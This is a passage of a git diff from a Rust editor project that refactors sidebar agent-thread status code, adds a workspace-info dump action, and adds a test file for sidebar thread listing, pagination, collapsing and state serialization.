s.has_notifications(cx)) - } - - #[gpui::test] - async fn test_notification_on_running_to_completed_transition(cx: &mut TestAppContext) { - init_test(cx); - let fs = FakeFs::new(cx.executor()); - cx.update(|cx| ::set_global(fs.clone(), cx)); - let project = project::Project::test(fs, [], cx).await; - - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); +fn all_thread_infos_for_workspace( + workspace: &Entity, + cx: &App, +) -> impl Iterator { + let Some(agent_panel) = workspace.read(cx).panel::(cx) else { + return None.into_iter().flatten(); + }; + let agent_panel = agent_panel.read(cx); + + let threads = agent_panel + .parent_threads(cx) + .into_iter() + .map(|thread_view| { + let thread_view_ref = thread_view.read(cx); + let thread = thread_view_ref.thread.read(cx); + + let icon = thread_view_ref.agent_icon; + let icon_from_external_svg = thread_view_ref.agent_icon_from_external_svg.clone(); + let title = thread + .title() + .unwrap_or_else(|| DEFAULT_THREAD_TITLE.into()); + let is_native = thread_view_ref.as_native_thread(cx).is_some(); + let is_title_generating = is_native && thread.has_provisional_title(); + let session_id = thread.session_id().clone(); + let is_background = agent_panel.is_background_thread(&session_id); + + let status = if thread.is_waiting_for_confirmation() { + AgentThreadStatus::WaitingForConfirmation + } else if thread.had_error() { + AgentThreadStatus::Error + } else { + match thread.status() { + ThreadStatus::Generating => AgentThreadStatus::Running, + ThreadStatus::Idle => AgentThreadStatus::Completed, + } + }; - let sidebar = multi_workspace.update_in(cx, |_mw, window, cx| { - let mw_handle = cx.entity(); - cx.new(|cx| Sidebar::new(mw_handle, window, cx)) - }); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.register_sidebar(sidebar.clone(), window, cx); - }); - cx.run_until_parked(); + let diff_stats = thread.action_log().read(cx).diff_stats(cx); - // Create a second workspace and switch to it so workspace 0 is background. - multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); - }); - cx.run_until_parked(); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.activate_index(1, window, cx); + ActiveThreadInfo { + session_id, + title, + status, + icon, + icon_from_external_svg, + is_background, + is_title_generating, + diff_stats, + } }); - cx.run_until_parked(); - assert!( - !has_notifications(&sidebar, cx), - "should have no notifications initially" - ); - - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Running, - cx, - ); + Some(threads).into_iter().flatten() +} - assert!( - !has_notifications(&sidebar, cx), - "Running status alone should not create a notification" - ); +pub fn dump_workspace_info( + workspace: &mut Workspace, + _: &DumpWorkspaceInfo, + window: &mut gpui::Window, + cx: &mut gpui::Context, +) { + use std::fmt::Write; + + let mut output = String::new(); + let this_entity = cx.entity(); + + let multi_workspace = workspace.multi_workspace().and_then(|weak| weak.upgrade()); + let workspaces: Vec> = match &multi_workspace { + Some(mw) => mw.read(cx).workspaces().cloned().collect(), + None => vec![this_entity.clone()], + }; + let active_workspace = multi_workspace + .as_ref() + .map(|mw| mw.read(cx).workspace().clone()); - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Completed, - cx, - ); + writeln!(output, "MultiWorkspace: {} workspace(s)", workspaces.len()).ok(); - assert!( - has_notifications(&sidebar, cx), - "Running → Completed transition should create a notification" - ); + if let Some(mw) = &multi_workspace { + let keys: Vec<_> = mw.read(cx).project_group_keys().cloned().collect(); + writeln!(output, "Project group keys ({}):", keys.len()).ok(); + for key in keys { + writeln!(output, " - {key:?}").ok(); + } } - #[gpui::test] - async fn test_no_notification_for_active_workspace(cx: &mut TestAppContext) { - init_test(cx); - let fs = FakeFs::new(cx.executor()); - cx.update(|cx| ::set_global(fs.clone(), cx)); - let project = project::Project::test(fs, [], cx).await; + writeln!(output).ok(); + + for (index, ws) in workspaces.iter().enumerate() { + let is_active = active_workspace.as_ref() == Some(ws); + writeln!( + output, + "--- Workspace {index}{} ---", + if is_active { " (active)" } else { "" } + ) + .ok(); + + // The action handler is already inside an update on `this_entity`, + // so we must avoid a nested read/update on that same entity. + if *ws == this_entity { + dump_single_workspace(workspace, &mut output, cx); + } else { + ws.read_with(cx, |ws, cx| { + dump_single_workspace(ws, &mut output, cx); + }); + } + } - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let project = workspace.project().clone(); + cx.spawn_in(window, async move |_this, cx| { + let buffer = project + .update(cx, |project, cx| project.create_buffer(None, false, cx)) + .await?; - let sidebar = multi_workspace.update_in(cx, |_mw, window, cx| { - let mw_handle = cx.entity(); - cx.new(|cx| Sidebar::new(mw_handle, window, cx)) + buffer.update(cx, |buffer, cx| { + buffer.set_text(output, cx); }); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.register_sidebar(sidebar.clone(), window, cx); + + let buffer = cx.new(|cx| { + editor::MultiBuffer::singleton(buffer, cx).with_title("Workspace Info".into()) }); - cx.run_until_parked(); - // Workspace 0 is the active workspace — thread completes while - // the user is already looking at it. - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Running, - cx, - ); - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Completed, - cx, - ); + _this.update_in(cx, |workspace, window, cx| { + workspace.add_item_to_active_pane( + Box::new(cx.new(|cx| { + let mut editor = + editor::Editor::for_multibuffer(buffer, Some(project.clone()), window, cx); + editor.set_read_only(true); + editor.set_should_serialize(false, cx); + editor.set_breadcrumb_header("Workspace Info".into()); + editor + })), + None, + true, + window, + cx, + ); + }) + }) + .detach_and_log_err(cx); +} - assert!( - !has_notifications(&sidebar, cx), - "should not notify for the workspace the user is already looking at" - ); - } +fn dump_single_workspace(workspace: &Workspace, output: &mut String, cx: &gpui::App) { + use std::fmt::Write; - #[gpui::test] - async fn test_notification_cleared_on_workspace_activation(cx: &mut TestAppContext) { - init_test(cx); - let fs = FakeFs::new(cx.executor()); - cx.update(|cx| ::set_global(fs.clone(), cx)); - let project = project::Project::test(fs, [], cx).await; + let workspace_db_id = workspace.database_id(); + match workspace_db_id { + Some(id) => writeln!(output, "Workspace DB ID: {id:?}").ok(), + None => writeln!(output, "Workspace DB ID: (none)").ok(), + }; - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let project = workspace.project().read(cx); - let sidebar = multi_workspace.update_in(cx, |_mw, window, cx| { - let mw_handle = cx.entity(); - cx.new(|cx| Sidebar::new(mw_handle, window, cx)) - }); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.register_sidebar(sidebar.clone(), window, cx); - }); - cx.run_until_parked(); + let repos: Vec<_> = project + .repositories(cx) + .values() + .map(|repo| repo.read(cx).snapshot()) + .collect(); - // Create a second workspace so we can switch away and back. - multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); - }); - cx.run_until_parked(); + writeln!(output, "Worktrees:").ok(); + for worktree in project.worktrees(cx) { + let worktree = worktree.read(cx); + let abs_path = worktree.abs_path(); + let visible = worktree.is_visible(); - // Switch to workspace 1 so workspace 0 becomes a background workspace. - multi_workspace.update_in(cx, |mw, window, cx| { - mw.activate_index(1, window, cx); - }); - cx.run_until_parked(); + let repo_info = repos + .iter() + .find(|snapshot| abs_path.starts_with(&*snapshot.work_directory_abs_path)); - // Thread on workspace 0 transitions Running → Completed while - // the user is looking at workspace 1. - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Running, - cx, - ); - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Completed, - cx, - ); + let is_linked = repo_info.map(|s| s.is_linked_worktree()).unwrap_or(false); + let original_repo_path = repo_info.map(|s| &s.original_repo_abs_path); + let branch = repo_info.and_then(|s| s.branch.as_ref().map(|b| b.ref_name.clone())); - assert!( - has_notifications(&sidebar, cx), - "background workspace completion should create a notification" - ); + write!(output, " - {}", abs_path.display()).ok(); + if !visible { + write!(output, " (hidden)").ok(); + } + if let Some(branch) = &branch { + write!(output, " [branch: {branch}]").ok(); + } + if is_linked { + if let Some(original) = original_repo_path { + write!(output, " [linked worktree -> {}]", original.display()).ok(); + } else { + write!(output, " [linked worktree]").ok(); + } + } + writeln!(output).ok(); + } - // Switching back to workspace 0 should clear the notification. - multi_workspace.update_in(cx, |mw, window, cx| { - mw.activate_index(0, window, cx); - }); - cx.run_until_parked(); + if let Some(panel) = workspace.panel::(cx) { + let panel = panel.read(cx); - assert!( - !has_notifications(&sidebar, cx), - "notification should be cleared when workspace becomes active" - ); + let panel_workspace_id = panel.workspace_id(); + if panel_workspace_id != workspace_db_id { + writeln!( + output, + " \u{26a0} workspace ID mismatch! panel has {panel_workspace_id:?}, workspace has {workspace_db_id:?}" + ) + .ok(); + } + + if let Some(thread) = panel.active_agent_thread(cx) { + let thread = thread.read(cx); + let title = thread.title().unwrap_or_else(|| "(untitled)".into()); + let session_id = thread.session_id(); + let status = match thread.status() { + ThreadStatus::Idle => "idle", + ThreadStatus::Generating => "generating", + }; + let entry_count = thread.entries().len(); + write!(output, "Active thread: {title} (session: {session_id})").ok(); + write!(output, " [{status}, {entry_count} entries").ok(); + if thread.is_waiting_for_confirmation() { + write!(output, ", awaiting confirmation").ok(); + } + writeln!(output, "]").ok(); + } else { + writeln!(output, "Active thread: (none)").ok(); + } + + let background_threads = panel.background_threads(); + if !background_threads.is_empty() { + writeln!( + output, + "Background threads ({}): ", + background_threads.len() + ) + .ok(); + for (session_id, conversation_view) in background_threads { + if let Some(thread_view) = conversation_view.read(cx).root_thread(cx) { + let thread = thread_view.read(cx).thread.read(cx); + let title = thread.title().unwrap_or_else(|| "(untitled)".into()); + let status = match thread.status() { + ThreadStatus::Idle => "idle", + ThreadStatus::Generating => "generating", + }; + let entry_count = thread.entries().len(); + write!(output, " - {title} (session: {session_id})").ok(); + write!(output, " [{status}, {entry_count} entries").ok(); + if thread.is_waiting_for_confirmation() { + write!(output, ", awaiting confirmation").ok(); + } + writeln!(output, "]").ok(); + } else { + writeln!(output, " - (not connected) (session: {session_id})").ok(); + } + } + } + } else { + writeln!(output, "Agent panel: not loaded").ok(); } + + writeln!(output).ok(); } diff --git a/crates/sidebar/src/sidebar_tests.rs b/crates/sidebar/src/sidebar_tests.rs new file mode 100644 index 0000000000000000000000000000000000000000..60881acfe9461f7897d6013831970444b7a65544 --- /dev/null +++ b/crates/sidebar/src/sidebar_tests.rs @@ -0,0 +1,5718 @@ +use super::*; +use acp_thread::StubAgentConnection; +use agent::ThreadStore; +use agent_ui::{ + test_support::{active_session_id, open_thread_with_connection, send_message}, + thread_metadata_store::ThreadMetadata, +}; +use chrono::DateTime; +use feature_flags::FeatureFlagAppExt as _; +use fs::FakeFs; +use gpui::TestAppContext; +use pretty_assertions::assert_eq; +use project::AgentId; +use settings::SettingsStore; +use std::{ + path::{Path, PathBuf}, + sync::Arc, +}; +use util::path_list::PathList; + +fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + theme_settings::init(theme::LoadThemes::JustBase, cx); + editor::init(cx); + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); +} + +#[track_caller] +fn assert_active_thread(sidebar: &Sidebar, session_id: &acp::SessionId, msg: &str) { + assert!( + sidebar + .active_entry + .as_ref() + .is_some_and(|e| e.is_active_thread(session_id)), + "{msg}: expected active_entry to be Thread({session_id:?}), got {:?}", + sidebar.active_entry, + ); +} + +#[track_caller] +fn assert_active_draft(sidebar: &Sidebar, workspace: &Entity, msg: &str) { + assert!( + matches!(&sidebar.active_entry, Some(ActiveEntry::Draft(ws)) if ws == workspace), + "{msg}: expected active_entry to be Draft for workspace {:?}, got {:?}", + workspace.entity_id(), + sidebar.active_entry, + ); +} + +fn has_thread_entry(sidebar: &Sidebar, session_id: &acp::SessionId) -> bool { + sidebar + .contents + .entries + .iter() + .any(|entry| matches!(entry, ListEntry::Thread(t) if &t.metadata.session_id == session_id)) +} + +async fn init_test_project( + worktree_path: &str, + cx: &mut TestAppContext, +) -> Entity { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(worktree_path, serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + project::Project::test(fs, [worktree_path.as_ref()], cx).await +} + +fn setup_sidebar( + multi_workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Entity { + let sidebar = setup_sidebar_closed(multi_workspace, cx); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + cx.run_until_parked(); + sidebar +} + +fn setup_sidebar_closed( + multi_workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Entity { + let multi_workspace = multi_workspace.clone(); + let sidebar = + cx.update(|window, cx| cx.new(|cx| Sidebar::new(multi_workspace.clone(), window, cx))); + multi_workspace.update(cx, |mw, cx| { + mw.register_sidebar(sidebar.clone(), cx); + }); + cx.run_until_parked(); + sidebar +} + +async fn save_n_test_threads( + count: u32, + project: &Entity, + cx: &mut gpui::VisualTestContext, +) { + for i in 0..count { + save_thread_metadata( + acp::SessionId::new(Arc::from(format!("thread-{}", i))), + format!("Thread {}", i + 1).into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, i).unwrap(), + None, + project, + cx, + ) + } + cx.run_until_parked(); +} + +async fn save_test_thread_metadata( + session_id: &acp::SessionId, + project: &Entity, + cx: &mut TestAppContext, +) { + save_thread_metadata( + session_id.clone(), + "Test".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + project, + cx, + ) +} + +async fn save_named_thread_metadata( + session_id: &str, + title: &str, + project: &Entity, + cx: &mut gpui::VisualTestContext, +) { + save_thread_metadata( + acp::SessionId::new(Arc::from(session_id)), + SharedString::from(title.to_string()), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + project, + cx, + ); + cx.run_until_parked(); +} + +fn save_thread_metadata( + session_id: acp::SessionId, + title: SharedString, + updated_at: DateTime, + created_at: Option>, + project: &Entity, + cx: &mut TestAppContext, +) { + cx.update(|cx| { + let (folder_paths, main_worktree_paths) = { + let project_ref = project.read(cx); + let paths: Vec> = project_ref + .visible_worktrees(cx) + .map(|worktree| worktree.read(cx).abs_path()) + .collect(); + let folder_paths = PathList::new(&paths); + let main_worktree_paths = project_ref.project_group_key(cx).path_list().clone(); + (folder_paths, main_worktree_paths) + }; + let metadata = ThreadMetadata { + session_id, + agent_id: agent::ZED_AGENT_ID.clone(), + title, + updated_at, + created_at, + folder_paths, + main_worktree_paths, + archived: false, + }; + ThreadMetadataStore::global(cx).update(cx, |store, cx| store.save_manually(metadata, cx)); + }); + cx.run_until_parked(); +} + +fn focus_sidebar(sidebar: &Entity, cx: &mut gpui::VisualTestContext) { + sidebar.update_in(cx, |_, window, cx| { + cx.focus_self(window); + }); + cx.run_until_parked(); +} + +fn visible_entries_as_strings( + sidebar: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Vec { + sidebar.read_with(cx, |sidebar, _cx| { + sidebar + .contents + .entries + .iter() + .enumerate() + .map(|(ix, entry)| { + let selected = if sidebar.selection == Some(ix) { + " <== selected" + } else { + "" + }; + match entry { + ListEntry::ProjectHeader { + label, + key, + highlight_positions: _, + .. + } => { + let icon = if sidebar.collapsed_groups.contains(key.path_list()) { + ">" + } else { + "v" + }; + format!("{} [{}]{}", icon, label, selected) + } + ListEntry::Thread(thread) => { + let title = thread.metadata.title.as_ref(); + let active = if thread.is_live { " *" } else { "" }; + let status_str = match thread.status { + AgentThreadStatus::Running => " (running)", + AgentThreadStatus::Error => " (error)", + AgentThreadStatus::WaitingForConfirmation => " (waiting)", + _ => "", + }; + let notified = if sidebar + .contents + .is_thread_notified(&thread.metadata.session_id) + { + " (!)" + } else { + "" + }; + let worktree = if thread.worktrees.is_empty() { + String::new() + } else { + let mut seen = Vec::new(); + let mut chips = Vec::new(); + for wt in &thread.worktrees { + if !seen.contains(&wt.name) { + seen.push(wt.name.clone()); + chips.push(format!("{{{}}}", wt.name)); + } + } + format!(" {}", chips.join(", ")) + }; + format!( + " {}{}{}{}{}{}", + title, worktree, active, status_str, notified, selected + ) + } + ListEntry::ViewMore { + is_fully_expanded, .. + } => { + if *is_fully_expanded { + format!(" - Collapse{}", selected) + } else { + format!(" + View More{}", selected) + } + } + ListEntry::DraftThread { worktrees, .. } => { + let worktree = if worktrees.is_empty() { + String::new() + } else { + let mut seen = Vec::new(); + let mut chips = Vec::new(); + for wt in worktrees { + if !seen.contains(&wt.name) { + seen.push(wt.name.clone()); + chips.push(format!("{{{}}}", wt.name)); + } + } + format!(" {}", chips.join(", ")) + }; + format!(" [~ Draft{}]{}", worktree, selected) + } + ListEntry::NewThread { worktrees, .. } => { + let worktree = if worktrees.is_empty() { + String::new() + } else { + let mut seen = Vec::new(); + let mut chips = Vec::new(); + for wt in worktrees { + if !seen.contains(&wt.name) { + seen.push(wt.name.clone()); + chips.push(format!("{{{}}}", wt.name)); + } + } + format!(" {}", chips.join(", ")) + }; + format!(" [+ New Thread{}]{}", worktree, selected) + } + } + }) + .collect() + }) +} + +#[gpui::test] +async fn test_serialization_round_trip(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(3, &project, cx).await; + + let path_list = project.read_with(cx, |project, cx| { + project.project_group_key(cx).path_list().clone() + }); + + // Set a custom width, collapse the group, and expand "View More". + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.set_width(Some(px(420.0)), cx); + sidebar.toggle_collapse(&path_list, window, cx); + sidebar.expanded_groups.insert(path_list.clone(), 2); + }); + cx.run_until_parked(); + + // Capture the serialized state from the first sidebar. + let serialized = sidebar.read_with(cx, |sidebar, cx| sidebar.serialized_state(cx)); + let serialized = serialized.expect("serialized_state should return Some"); + + // Create a fresh sidebar and restore into it. + let sidebar2 = + cx.update(|window, cx| cx.new(|cx| Sidebar::new(multi_workspace.clone(), window, cx))); + cx.run_until_parked(); + + sidebar2.update_in(cx, |sidebar, window, cx| { + sidebar.restore_serialized_state(&serialized, window, cx); + }); + cx.run_until_parked(); + + // Assert all serialized fields match. + let (width1, collapsed1, expanded1) = sidebar.read_with(cx, |s, _| { + ( + s.width, + s.collapsed_groups.clone(), + s.expanded_groups.clone(), + ) + }); + let (width2, collapsed2, expanded2) = sidebar2.read_with(cx, |s, _| { + ( + s.width, + s.collapsed_groups.clone(), + s.expanded_groups.clone(), + ) + }); + + assert_eq!(width1, width2); + assert_eq!(collapsed1, collapsed2); + assert_eq!(expanded1, expanded2); + assert_eq!(width1, px(420.0)); + assert!(collapsed1.contains(&path_list)); + assert_eq!(expanded1.get(&path_list), Some(&2)); +} + +#[gpui::test] +async fn test_restore_serialized_archive_view_does_not_panic(cx: &mut TestAppContext) { + // A regression test to ensure that restoring a serialized archive view does not panic. + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, _panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + cx.update(|_window, cx| { + AgentRegistryStore::init_test_global(cx, vec![]); + }); + + let serialized = serde_json::to_string(&SerializedSidebar { + width: Some(400.0), + collapsed_groups: Vec::new(), + expanded_groups: Vec::new(), + active_view: SerializedSidebarView::Archive, + }) + .expect("serialization should succeed"); + + multi_workspace.update_in(cx, |multi_workspace, window, cx| { + if let Some(sidebar) = multi_workspace.sidebar() { + sidebar.restore_serialized_state(&serialized, window, cx); + } + }); + cx.run_until_parked(); + + // After the deferred `show_archive` runs, the view should be Archive. + sidebar.read_with(cx, |sidebar, _cx| { + assert!( + matches!(sidebar.view, SidebarView::Archive(_)), + "expected sidebar view to be Archive after restore, got ThreadList" + ); + }); +} + +#[test] +fn test_clean_mention_links() { + // Simple mention link + assert_eq!( + Sidebar::clean_mention_links("check [@Button.tsx](file:///path/to/Button.tsx)"), + "check @Button.tsx" + ); + + // Multiple mention links + assert_eq!( + Sidebar::clean_mention_links( + "look at [@foo.rs](file:///foo.rs) and [@bar.rs](file:///bar.rs)" + ), + "look at @foo.rs and @bar.rs" + ); + + // No mention links — passthrough + assert_eq!( + Sidebar::clean_mention_links("plain text with no mentions"), + "plain text with no mentions" + ); + + // Incomplete link syntax — preserved as-is + assert_eq!( + Sidebar::clean_mention_links("broken [@mention without closing"), + "broken [@mention without closing" + ); + + // Regular markdown link (no @) — not touched + assert_eq!( + Sidebar::clean_mention_links("see [docs](https://example.com)"), + "see [docs](https://example.com)" + ); + + // Empty input + assert_eq!(Sidebar::clean_mention_links(""), ""); +} + +#[gpui::test] +async fn test_entities_released_on_window_close(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + let weak_workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().downgrade()); + let weak_sidebar = sidebar.downgrade(); + let weak_multi_workspace = multi_workspace.downgrade(); + + drop(sidebar); + drop(multi_workspace); + cx.update(|window, _cx| window.remove_window()); + cx.run_until_parked(); + + weak_multi_workspace.assert_released(); + weak_sidebar.assert_released(); + weak_workspace.assert_released(); +} + +#[gpui::test] +async fn test_single_workspace_no_threads(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " [+ New Thread]"] + ); +} + +#[gpui::test] +async fn test_single_workspace_with_saved_threads(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-1")), + "Fix crash in project panel".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 3, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-2")), + "Add inline diff view".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in project panel", + " Add inline diff view", + ] + ); +} + +#[gpui::test] +async fn test_workspace_lifecycle(cx: &mut TestAppContext) { + let project = init_test_project("/project-a", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Single workspace with a thread + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-a1")), + "Thread A1".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Thread A1"] + ); + + // Add a second workspace + multi_workspace.update_in(cx, |mw, window, cx| { + mw.create_test_workspace(window, cx).detach(); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Thread A1",] + ); + + // Remove the second workspace + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().nth(1).cloned().unwrap(); + mw.remove(&workspace, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Thread A1"] + ); +} + +#[gpui::test] +async fn test_view_more_pagination(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(12, &project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Thread 12", + " Thread 11", + " Thread 10", + " Thread 9", + " Thread 8", + " + View More", + ] + ); +} + +#[gpui::test] +async fn test_view_more_batched_expansion(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Create 17 threads: initially shows 5, then 10, then 15, then all 17 with Collapse + save_n_test_threads(17, &project, cx).await; + + let path_list = project.read_with(cx, |project, cx| { + project.project_group_key(cx).path_list().clone() + }); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Initially shows 5 threads + View More + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 7); // header + 5 threads + View More + assert!(entries.iter().any(|e| e.contains("View More"))); + + // Focus and navigate to View More, then confirm to expand by one batch + focus_sidebar(&sidebar, cx); + for _ in 0..7 { + cx.dispatch_action(SelectNext); + } + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + // Now shows 10 threads + View More + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 12); // header + 10 threads + View More + assert!(entries.iter().any(|e| e.contains("View More"))); + + // Expand again by one batch + sidebar.update_in(cx, |s, _window, cx| { + let current = s.expanded_groups.get(&path_list).copied().unwrap_or(0); + s.expanded_groups.insert(path_list.clone(), current + 1); + s.update_entries(cx); + }); + cx.run_until_parked(); + + // Now shows 15 threads + View More + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 17); // header + 15 threads + View More + assert!(entries.iter().any(|e| e.contains("View More"))); + + // Expand one more time - should show all 17 threads with Collapse button + sidebar.update_in(cx, |s, _window, cx| { + let current = s.expanded_groups.get(&path_list).copied().unwrap_or(0); + s.expanded_groups.insert(path_list.clone(), current + 1); + s.update_entries(cx); + }); + cx.run_until_parked(); + + // All 17 threads shown with Collapse button + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 19); // header + 17 threads + Collapse + assert!(!entries.iter().any(|e| e.contains("View More"))); + assert!(entries.iter().any(|e| e.contains("Collapse"))); + + // Click collapse - should go back to showing 5 threads + sidebar.update_in(cx, |s, _window, cx| { + s.expanded_groups.remove(&path_list); + s.update_entries(cx); + }); + cx.run_until_parked(); + + // Back to initial state: 5 threads + View More + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 7); // header + 5 threads + View More + assert!(entries.iter().any(|e| e.contains("View More"))); +} + +#[gpui::test] +async fn test_collapse_and_expand_group(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + + let path_list = project.read_with(cx, |project, cx| { + project.project_group_key(cx).path_list().clone() + }); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1"] + ); + + // Collapse + sidebar.update_in(cx, |s, window, cx| { + s.toggle_collapse(&path_list, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project]"] + ); + + // Expand + sidebar.update_in(cx, |s, window, cx| { + s.toggle_collapse(&path_list, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1"] + ); +} + +#[gpui::test] +async fn test_visible_entries_as_strings(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let expanded_path = PathList::new(&[std::path::PathBuf::from("/expanded")]); + let collapsed_path = PathList::new(&[std::path::PathBuf::from("/collapsed")]); + + sidebar.update_in(cx, |s, _window, _cx| { + s.collapsed_groups.insert(collapsed_path.clone()); + s.contents + .notified_threads + .insert(acp::SessionId::new(Arc::from("t-5"))); + s.contents.entries = vec![ + // Expanded project header + ListEntry::ProjectHeader { + key: project::ProjectGroupKey::new(None, expanded_path.clone()), + label: "expanded-project".into(), + highlight_positions: Vec::new(), + has_running_threads: false, + waiting_thread_count: 0, + is_active: true, + }, + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("t-1")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Completed thread".into(), + updated_at: Utc::now(), + created_at: 